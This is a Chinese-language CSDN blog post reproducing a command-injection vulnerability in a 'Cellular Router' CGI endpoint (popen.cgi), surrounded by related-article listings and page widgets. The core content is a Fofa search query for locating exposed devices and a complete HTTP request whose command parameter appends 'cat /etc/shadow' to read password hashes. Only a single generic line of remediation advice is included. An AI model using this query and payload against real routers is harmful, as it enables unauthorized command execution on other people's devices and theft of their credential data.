移动路由器Cellular Router命令执行

最新推荐文章于 2024-10-16 15:43:10 发布
最新推荐文章于 2024-10-16 15:43:10 发布
阅读量208 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142257695
版权

0x01 漏洞描述:

移动路由器(Cellular Router)是一种利用移动网络提供无线互联网连接的设备。它们类似于传统路由器,但不同于使用有线连接(如以太网或DSL),它们利用移动数据网络来建立互联网连接。Cellular Router存在命令执行漏洞,攻击者通过在受攻击系统上执行恶意命令,从而获取未授权的系统访问权限。

0x02 搜索语句:

Fofa:title="index" && header="lighttpd/1.4.30"

0x03 漏洞复现:

GET /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137912 HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length:322

 

0x04 修复建议:

对用户输入进行验证和过滤,确保只允许合法的输入字符和格式。

iSee857
关注
专栏目录
移动路由器Cellular Router命令执行漏洞复现 [附POC]
薛定谔嘚喵博客
10-31 1192
移动路由器Cellular Router)是一种网络设备,通常用于提供移动网络连接的路由和数据传输功能。它们通常使用蜂窝(Cellular)网络技术,如4G LTE或5G,来连接到互联网。移动路由器与传统的有线路由器不同,因为它们不依赖于固定的互联网连接,而是使用无线信号来访问网络。
【1day】复现Cellular Router命令执行漏洞
记录并分享学习安全的知识点..
08-30 372
移动路由器Cellular Router)是一种利用移动网络提供无线互联网连接的设备。它们类似于传统路由器,但不同于使用有线连接(如以太网或DSL),它们利用移动数据网络来建立互联网连接。Cellular Router存在命令执行漏洞,攻击者通过在受攻击系统上执行恶意命令,从而获取未授权的系统访问权限。
【漏洞复现】Cellular-Router-popen-命令执行漏洞
知黑而守白
02-01 93
移动路由器Cellular Router)是一种网络设备,通常用于提供移动网络连接的路由和数据传输功能。它们通常使用蜂窝(Cellular)网络技术,如4G LTE或5G,来连接到互联网。移动路由器与传统的有线路由器不同,因为它们不依赖于固定的互联网连接,而是使用无线信号来访问网络移动路由器Cellular Router) popen 接口存在一个命令执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
路由器交换机(VRP系统)常用命令
潮听哥的博客
08-31 3343
一、常用命令 #1 查看设备版本信息 <Router1>display version #2 用户视图 -> 系统视图 <Router1>system-view [Router1] #3 为设备命名 [Router1]sysname Datacom-Router [Datacom-Router] #4 进入接口视图 [Datacom-Router]inter //输入TAB补全命令 [Datacom-Router]
路由器详解
Princesk的博客
03-17 1006
一、Router路由器基本组成和组件 trace your kernel 监视路由内核追踪器 斑驴内核: Quagga由四个组件组成:zebra(对每一个路由协议单独使用守护进程,用来更新内核路由表)、ripd、bgpd、ospfd(三个路由进程守护协议进程,把态路由协议学习到路由信息交给zebra守护进程)。 zebra与kernel routed交互,把路由信息给kernel,内核根据路由协议守护进程(ripd、ospfd、bgpd)更新路由表 ripd、ospfd、bgpd先向广播地址学习路由协议,
路由器接口配置与管理——5
kaoa000的专栏——非淡泊无以明志,非宁静无以致远
06-17 4700
广域网接口配置 六、3G Cellular接口配置与管理 3G Cellular接口是设备提供的支持3G技术的物理接口,为用户提供企业级的无线广域网接入服务。 1、3G Cellular接口介绍 特殊场合需要使用无线连接:1)偏远分支或海上油田,有线接入服务不可用或成本很高;2)灾区现场,需要快速连接和临时连接;3)加油站、ATM机等站点分布广,有线接入网无法完全覆盖;4)企业人员需要移动
【计算机网络】—什么是蜂窝移动网络?
2401_84419493的博客
07-05 737
四轮技术面+一轮hr面结束,学习到了不少,面试也是一个学习检测自己的过程,面试前大概复习了 一周的时间,把以前的代码看了一下,字节跳比较注重算法,面试前刷了下leetcode和剑指offer, 也刷了些在牛客网上的面经。大概就说这些了,写代码去了~祝大家都能收获大厂offer~篇幅有限,仅展示部分内容。
CIP.zip_CIP_cellular ip
09-24
4. 路由器Router):在整个网络中传递数据包,包括MN和HNA/ENA之间的通信。 CIP的关键特性包括: 1. 地址绑定更新:当MN移动到新的基站时,CIP会自更新其IP地址与新位置的关联,确保数据包能正确到达。 2. ...
计算机网络知识点总结(一)-----蜂窝移动网络
m0_50654102的博客
04-25 1558
文章目录蜂窝移动网络TCP三次握手四次挥手TCP粘包和拆包滑窗口和流速控制TCP协议与UDP协议 蜂窝移动网络 TCP三次握手四次挥手 TCP粘包和拆包 滑窗口和流速控制 TCP协议与UDP协议
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
10-10 986
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全的全面指南
qq_42568323的博客
10-09 1218
网络安全是指保护计算机网络及其数据免受未经授权访问、攻击或破坏的过程。其目标是确保信息的机密性、完整性和可用性。
ISO 21434标准下汽车软件开发的网络安全核心要求
最新发布
yayuanjingkeji的博客
10-16 217
ISO 21434《道路车辆——汽车网络安全工程》是一个针对汽车网络安全的国际标准,它对汽车软件开发提出了明确的要求,以确保车辆在整个生命周期内的网络安全。ISO 21434网络安全标准对汽车软件开发提出了全面而严格的要求,旨在确保汽车软件在整个生命周期内都具备高度的安全性和合规性。这些要求将推汽车行业更加注重网络安全,提升整个车辆网络系统的安全性能,为驾驶员和乘客提供更加安全的出行保障。7. 质量管理与持续改进。9. 风险评估与安全控制。3. 安全验证与评估。6. 组织能力与培训。
网络攻击的新趋势:勒索软件与零日漏洞
A526847的博客
10-12 924
随着数字化技术的飞速发展网络攻击的新趋势:勒索软件与零日漏洞,网络攻击的形式也在不断演变。近年来,勒索软件和零日漏洞已成为网络攻击中的两大新趋势,给个人、企业和政府机构带来了巨大的安全威胁。本文将深入探讨这两种网络攻击手段的特点、危害以及防范措施。
网络安全公司及其主要产品介绍
xixixi7777的博客
10-13 341
各大安全公司提供的网络安全产品针对不同的企业需求和网络架构,涵盖从端点安全、网络安全到云安全的全方位解决方案。在选择网络安全产品时,企业应结合自身的网络规模、威胁类型和业务需求,选择适合的产品组合,以建立健全的网络安全体系。Huawei Cyber Security Intelligence System(CIS):基于大数据的安全智能平台,支持安全威胁的早期检测和响应。FireEye Helix:集成SIEM和安全运营中心功能的安全管理平台,提供集中化的威胁管理和自化响应。
网络安全(黑客)——自学2024
2401_84466325的博客
10-10 2034
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-10 1005
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
你存在,在我们的攻击画像里
2401_84488651的博客
10-16 1001
攻击者画像,就像是给网络攻击者画的一张“肖像画”,它站在高维度的攻击者视角,通过分析攻击者的行为模式、使用的技术和工具、攻击的目标和频率等信息,每天从数千万的攻击告警中提炼有效信息,最终构建出一份关于攻击者的详细“档案”。
网络安全知识核心20要点
2401_84466227的博客
10-16 541
攻击者在 HTTP 请求中注入恶意的 SQL 代码,服务器使用参数构建数据库 SQL 命令时,恶意SQL 被一起构造,并在数据库中执行
H3C路由器配置指南:40-50系列命令行设置
2. **系统命名**:使用`sysname`命令路由器命名为“H3C”,便于识别和管理。 3. **超级用户密码**:`superpassword`用于设置三级权限的超级用户密码,这里是“level3 simple liao532200”。 4. **NAT地址组**:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值